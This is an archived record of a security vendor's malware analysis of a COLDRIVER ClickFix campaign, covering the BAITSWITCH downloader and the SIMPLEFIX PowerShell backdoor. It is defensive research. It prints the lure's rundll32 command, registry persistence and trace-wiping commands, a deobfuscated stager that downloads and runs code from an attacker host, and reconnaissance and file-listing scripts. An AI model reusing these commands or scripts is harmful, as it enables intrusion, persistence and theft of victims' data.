{ "id": "5fc78e25-3a1a-4dd6-939d-780414320679", "created_at": "2026-04-06T00:11:47.235623Z", "updated_at": "2026-04-10T03:34:43.767096Z", "deleted_at": null, "sha1_hash": "3d980b6df91d2d6b6f909111f07c0f5bba05c9b6", "title": "COLDRIVER Adds BAITSWITCH and SIMPLEFIX | ThreatLabz", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 531282, "plain_text": "COLDRIVER Adds BAITSWITCH and SIMPLEFIX |\r\nThreatLabz\r\nBy Sudeep Singh, Yin Hong Chang\r\nPublished: 2025-09-24 · Archived: 2026-04-05 21:12:47 UTC\r\nTechnical Analysis\r\nIn this section, a detailed analysis is provided for each component of the attack chain initiated when a victim visits\r\na ClickFix webpage and performs the actions prompted by the site. The figure below provides an overview of the\r\nmulti-stage attack chain.\r\nhttps://www.zscaler.com/blogs/security-research/coldriver-updates-arsenal-baitswitch-and-simplefix\r\nPage 1 of 9\n\nFigure 1: Multi-stage end-to-end ClickFix campaign attack chain leveraging BAITSWITCH to deliver\r\nSIMPLEFIX.\r\nClickFix / CAPTCHA verification\r\nThe infection chain begins with a webpage masquerading as an information resource addressing challenges faced\r\nby members of civil society and think tanks in Russia. This webpage employs the ClickFix social-engineering\r\nattack method to trick users into executing a malicious command in the Windows Run dialog box by displaying a\r\nfake Cloudflare Turnstile checkbox, as shown in the figure below. \r\nhttps://www.zscaler.com/blogs/security-research/coldriver-updates-arsenal-baitswitch-and-simplefix\r\nPage 2 of 9\n\nFigure 2: Fake Cloudflare Turnstile checkbox.\r\nWhen the user clicks the checkbox, the embedded JavaScript code copies a malicious command ( rundll32.exe\r\n\\\\captchanom.top\\check\\machinerie.dll,verifyme ) to the user’s clipboard. Next, the page displays UI elements\r\ndesigned to prompt the user to paste and execute this command in the Windows Run dialog box. This action\r\nexecutes  machinerie.dll (BAITSWITCH) via  rundll32.exe , invoking its  verifyme export function. While\r\nthis UI is displayed, the JavaScript code waits for a set timeout before redirecting the victim to a decoy document\r\nhosted on Google Drive, created by the threat-actor controlled account  narnobudaeva@gmail[.]com . The figure\r\nbelow shows the contents of this decoy document.\r\nhttps://www.zscaler.com/blogs/security-research/coldriver-updates-arsenal-baitswitch-and-simplefix\r\nPage 3 of 9\n\nFigure 3: Example of a ClickFix social-engineering decoy document hosted on Google Drive.\r\nThis two-page decoy document describes efforts to build resilience for exiled members of Russian civil society,\r\nsuch as human rights defenders, journalists, educators, and civic activists, through mentorship and fellowship\r\nprograms.\r\nBAITSWITCH downloader DLL\r\nBAITSWITCH ( Machinerie.dll ) is a downloader that establishes persistence and retrieves stager payloads to\r\nexecute the SIMPLEFIX backdoor. It connects to URLs using a hardcoded user-agent string ( Mozilla/5.0\r\n(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36\r\nEdge/133.0.0.0 ) to receive and execute commands. The command-and-control (C2) server responds with\r\ncommands only when this specific user-agent string is used, returning a “404 Not Found” page otherwise.\r\nBAITSWITCH makes five HTTP requests to the threat actor-controlled domain  captchanom[.]top to receive\r\nvarious commands and download the PowerShell-based SIMPLEFIX backdoor. For each response from the C2\r\nserver, BAITSWITCH uses the  lpCommandLine parameter of  CreateProcessA to execute the command on the\r\nendpoint. Below is the sequence of requests made:\r\n1. The first request to the URL  hxxps://captchanom[.]top/coup/premier retrieves a command to establish\r\npersistence. This command executes the  reg executable, configuring the  UserInitMprLogonScript registry key\r\nto run a PowerShell script (downloaded later) with a specific argument at the next user logon. Below is the\r\ncommand received:\r\nhttps://www.zscaler.com/blogs/security-research/coldriver-updates-arsenal-baitswitch-and-simplefix\r\nPage 4 of 9\n\nreg add \"HKCU\\Environment\" /v UserInitMprLogonScript /t REG_SZ /d \"powershell -WindowStyle Hidden -ep bypass \\\"\r\n2. The second request to the URL hxxps://captchanom[.]top/coup/deuxieme retrieves a command to store\r\nencrypted payloads in the Windows registry. The received command executes PowerShell to add a Base64-\r\nencoded, AES-encrypted PowerShell script (stored in $ii ) and a Base64-encoded AES decryption key (stored in\r\n$iii ) to the Windows registry keys EnthusiastMod and QatItems , respectively. This encrypted script will be\r\ndecrypted and executed in subsequent stages. Below is the command received:\r\npowershell -c \"$ii = 'kXvyDMF+...iL54E0QbEXJyRA==';$iii = 'yuClT3Iwhv9SERwcmKipg=';$rrr = 'HKCU:\\SOFTWARE\\Micro\r\n3. In the third request to the URL  hxxps://captchanom[.]top/coup/troisieme , BAITSWITCH downloads a\r\nPowerShell stager from a different server ( southprovesolutions[.]com/FvFLcsr23 ) and saves it to the\r\npath  %APPDATA%\\Microsoft\\Windows\\FvFLcsr23.ps1 , referenced earlier in the persistence setup. Below is the\r\ncommand received:\r\npowershell -c\"Invoke-WebRequest -Uri \\\"hxxps://southprovesolutions[.]com/FvFLcsr23\\\" -OutFile \\\"$Env:APPDATA\\M\r\n4. The fourth request to the URL  hxxps://captchanom[.]top/coup/quatre retrieves a command to clear\r\nthe  RunMRU registry key. The  RunMRU key stores the Most Recently Used (MRU) commands entered into the\r\nRun dialog (Win + R). Since the ClickFix attack begins with the user pasting the malicious command into \"Win +\r\nR,\" this action effectively erases any trace of the attack. Below is the command received:\r\nreg delete HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f\r\n5. In the fifth and final request to the URL  hxxps://captchanom[.]top/ , BAITSWITCH sends the victim’s\r\nhostname to the C2, possibly to register the victim with the C2 server. No response was observed from this URL.\r\nPowerShell stager\r\nOn the next Windows logon, the PowerShell stager executes with the command-line\r\nparameter  7eHgxjgbBs3gHdkgx9AsRC , as specified in the logon script registry key. \r\nThis script uses basic string obfuscation techniques:\r\nMultiple Base64-encoded strings are decoded, transformed, and concatenated to construct the decoded\r\nPowerShell script.\r\nAfter decoding, each Base64-encoded string undergoes the following transformations:\r\nReplace all newline characters with semicolon characters.\r\nDelete all non-ASCII characters ( [^\\x20-\\x7E] ).\r\nDelete all 2-byte hex-encoded characters ( (?i)x[0-9A-Fa-f]{4} ).\r\nBelow is the deobfuscated PowerShell-based stager.\r\nhttps://www.zscaler.com/blogs/security-research/coldriver-updates-arsenal-baitswitch-and-simplefix\r\nPage 5 of 9\n\nfunction WWW($value) {\r\n $scriptBlock = [scriptblock]::Create($value); \u0026 $scriptBlock\r\n};\r\nfunction WWWWW {\r\n param([string] $eeee, [string] $eeeee);\r\n try {\r\n $eee = [Convert]::FromBase64String($eeee);\r\n $eeeeee = $eee[0. .15];\r\n $eeeeeee = $eee[16..($eee.Length - 1)];\r\n $e = [System.Security.Cryptography.Aes]::Create();\r\n $e.Key = [Convert]::FromBase64String($eeeee);\r\n $e.IV = $eeeeee;\r\n $ee = $e.CreateDecryptor();\r\n $eeeeeeee = $ee.TransformFinalBlock($eeeeeee, 0, $eeeeeee.Length);\r\n return [Text.Encoding]::UTF8.GetString($eeeeeeee);\r\n } finally {\r\n if ($e) {\r\n $e.Dispose()\r\n }\r\n }\r\n};\r\n$wwwwww = Get - ItemPropertyValue - Path 'HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\CLSID\\{53121F\r\n$wwwwwww = Get - ItemPropertyValue - Path 'HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\CLSID\\{53121\r\n$key = $global: wwww + [System.Text.Encoding]::UTF8.GetString($wwwwwww);\r\n$wwwwwwww = [System.Text.Encoding]::UTF8.GetString($wwwwww);\r\n$w = WWWWW $wwwwwwww $key;\r\nWWW - value $w;\r\nThe stager has the following functionality:\r\nReads the Base64-encoded and AES-encrypted PowerShell script\r\nfrom  HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\CLSID\\53121F47-8C52-44A7-89A5-\r\n5595BB2B32BE}\\DefaultIcon\\\\EnthusiastMode .\r\nReads a string from  HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\CLSID\\53121F47-\r\n8C52-44A7-89A5-5595BB2B32BE}\\DefaultIcon\\\\QatItems .\r\nConcatenates the command-line parameter and the string from the registry to form the full Base64-encoded\r\nAES key:  7eHgxjgbBs3gHdkgx9AsRCyuClT3Iwhv9SERwcmKipg= .\r\nThe PowerShell script is decrypted using the first 16 bytes of the Base64-decoded blob as the initialization\r\nvector (IV) and a 32-byte decryption key. Below is the resulting decrypted script.\r\n$ia = @(\"southprovesolutions.com\");\r\n$fff = $false;\r\nwhile (-not $fff) {\r\n foreach ($iii in $ia) {\r\n if ((Invoke-WebRequest -Uri \"https://$iii/\" -UseBasicParsing -Method Head -TimeoutSec 5 -ErrorAction Sile\r\nhttps://www.zscaler.com/blogs/security-research/coldriver-updates-arsenal-baitswitch-and-simplefix\r\nPage 6 of 9\n\n$wc=New-Object System.Net.WebClient;\r\n Invoke-Command -ScriptBlock ([scriptblock]::Create($wc.DownloadString(\"https://$iii/Zxdf\")));\r\n $fff = $true;\r\n break;\r\n }\r\n else {}\r\n };\r\n if (-not $fff) {\r\n Start-Sleep -Seconds 5;\r\n }\r\n};\r\nThis decrypted PowerShell script fetches the SIMPLEFIX backdoor from the\r\nURL  hxxps://southprovesolutions[.]com/Zxdf .\r\nSIMPLEFIX backdoor\r\nSIMPLEFIX employs obfuscation techniques similar to those employed in the stager PowerShell script. The\r\nresulting deobfuscated script is available in the ThreatLabz GitHub repository.\r\nThe script enters a loop to execute the following steps every 3 minutes:\r\nGenerate a user-agent string by combining the computer name, username, and the machine’s UUID\r\n(retrieved using WMI). This user-agent string is used for all communications with the C2 server.\r\nSend a request to  hxxps://southprovesolutions[.]com/KZouoRc and parse the response for commands to\r\nexecute.\r\nAfter each command is successfully executed, an HTTP request is sent\r\nto  hxxps://southprovesolutions[.]com/VUkXugsYgu , likely to notify the C2 server of the successful\r\ncommand execution.\r\nSIMPLEFIX supports the commands outlined in the table below:\r\nCommand Description\r\n1\r\nRetrieves a URL hosting a binary and a command-line parameter used to launch this binary. If\r\na filename is included in the URL, the binary is dropped with the same filename in\r\nthe  %temp% path. If no filename is included in the URL, the hardcoded name  AkdD2sS.exe is\r\nused instead.\r\nhttps://www.zscaler.com/blogs/security-research/coldriver-updates-arsenal-baitswitch-and-simplefix\r\nPage 7 of 9\n\nCommand Description\r\n2\r\nRetrieves a set of commands to be executed on the user's machine. At the time of analysis, the\r\ncommands received were used to collect information about the system, network, and user. The\r\noutput of these commands is sent in an HTTP POST request\r\nto  hxxps://southprovesolutions[.]com/EPAWl .\r\n3\r\nExecutes a PowerShell script and sends the command output via an HTTP POST request\r\nto  hxxps://southprovesolutions[.]com/EPAWl .\r\nTable 1: Commands supported by SIMPLEFIX.\r\nAt the time of analysis, the commands in the following table were received:\r\nID Command Description\r\n2\r\nwhoami /all \u0026 ipconfig /all \u0026 systeminfo \u0026 net share \u0026 net session \u0026\r\nipconfig /displaydns \u0026 query session \u0026 net user \u0026 netstat -ano \u0026 arp -\r\na\r\nCommands for\r\nreconnaissance,\r\nincluding gathering\r\ninformation about\r\nthe user, network\r\nconfiguration, and\r\nsystem.\r\nwhoami/all\r\nCollects\r\ninformation about\r\nthe user.\r\n3 [string[]]$di = @('Documents','Downloads','Desktop','OneDrive');\r\n[string[]]$fi = @('.pdf','.doc','.xls','.txt', '.zip', '.rar',\r\n'.7z');$r = [Environment]::GetFolderPath('UserProfile');$tr =\r\n[System.Collections.Generic.List[string]]::new();function PD {\r\nparam([string]$p); try { $md = $false; foreach ($i in $di) { if ($p -\r\nlike \"*${i}*\") { $md = $true; break }};if (-not $md) { return};\r\n[System.IO.Directory]::EnumerateFiles($p) | ForEach-Object { foreach\r\n($f in $fi) { if ($_ -like \"*${f}*\") { $ii =\r\nPowerShell script\r\nthat exfiltrates\r\ninformation about a\r\nhardcoded list of\r\nfile types found in\r\na pre-configured\r\nlist of directories.\r\nThe file types\r\nhttps://www.zscaler.com/blogs/security-research/coldriver-updates-arsenal-baitswitch-and-simplefix\r\nPage 8 of 9\n\nID Command Description\r\n[System.IO.FileInfo]::new($_);$tr.Add(\"[File]$_ $($ii.Length)\r\n$($ii.LastWriteTime)`n\");break;}}};\r\n[System.IO.Directory]::EnumerateDirectories($p) | ForEach-Object { PD\r\n$_ }} catch [System.UnauthorizedAccessException] {} catch {}};\r\n[System.IO.Directory]::EnumerateDirectories($r) | ForEach-Object { PD\r\n$_ };$tr;\r\ncorrespond to\r\ndocuments and\r\narchives that may\r\nbe of interest for\r\nstrategic\r\nintelligence\r\ncollection.\r\nThe list of\r\ndirectories and file\r\nextensions scanned\r\nare very similar to\r\nthe LOSTKEYS\r\nVBScript-based\r\nmalware used by\r\nCOLDRIVER in\r\nJanuary 2025.\r\nexit\r\nTerminates the\r\nSIMPLEFIX\r\nbackdoor.\r\nTable 2: ThreatLabz observed these commands being sent to the SIMPLEFIX backdoor.\r\nSource: https://www.zscaler.com/blogs/security-research/coldriver-updates-arsenal-baitswitch-and-simplefix\r\nhttps://www.zscaler.com/blogs/security-research/coldriver-updates-arsenal-baitswitch-and-simplefix\r\nPage 9 of 9", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.zscaler.com/blogs/security-research/coldriver-updates-arsenal-baitswitch-and-simplefix" ], "report_names": [ "coldriver-updates-arsenal-baitswitch-and-simplefix" ], "threat_actors": [ { "id": "79bd28a6-dc10-419b-bee7-25511ae9d3d4", "created_at": "2023-01-06T13:46:38.581534Z", "updated_at": "2026-04-10T02:00:03.029872Z", "deleted_at": null, "main_name": "Callisto", "aliases": [ "BlueCharlie", "Star Blizzard", "TAG-53", "Blue Callisto", "TA446", "IRON FRONTIER", "UNC4057", "COLDRIVER", "SEABORGIUM", "GOSSAMER BEAR" ], "source_name": "MISPGALAXY:Callisto", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "3aedca2f-6f6c-4470-af26-a46097d3eab5", "created_at": "2024-11-01T02:00:52.689773Z", "updated_at": "2026-04-10T02:00:05.396502Z", "deleted_at": null, "main_name": "Star Blizzard", "aliases": [ "Star Blizzard", "SEABORGIUM", "Callisto Group", "TA446", "COLDRIVER" ], "source_name": "MITRE:Star Blizzard", "tools": [ "Spica" ], "source_id": "MITRE", "reports": null }, { "id": "3a057a97-db21-4261-804b-4b071a03c124", "created_at": "2024-06-04T02:03:07.953282Z", "updated_at": "2026-04-10T02:00:03.813595Z", "deleted_at": null, "main_name": "IRON FRONTIER", "aliases": [ "Blue Callisto ", "BlueCharlie ", "CALISTO ", "COLDRIVER ", "Callisto Group ", "GOSSAMER BEAR ", "SEABORGIUM ", "Star Blizzard ", "TA446 " ], "source_name": "Secureworks:IRON FRONTIER", "tools": [ "Evilginx2", "Galileo RCS", "SPICA" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434307, "ts_updated_at": 1775792083, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/3d980b6df91d2d6b6f909111f07c0f5bba05c9b6.pdf", "text": "https://archive.orkl.eu/3d980b6df91d2d6b6f909111f07c0f5bba05c9b6.txt", "img": "https://archive.orkl.eu/3d980b6df91d2d6b6f909111f07c0f5bba05c9b6.jpg" } }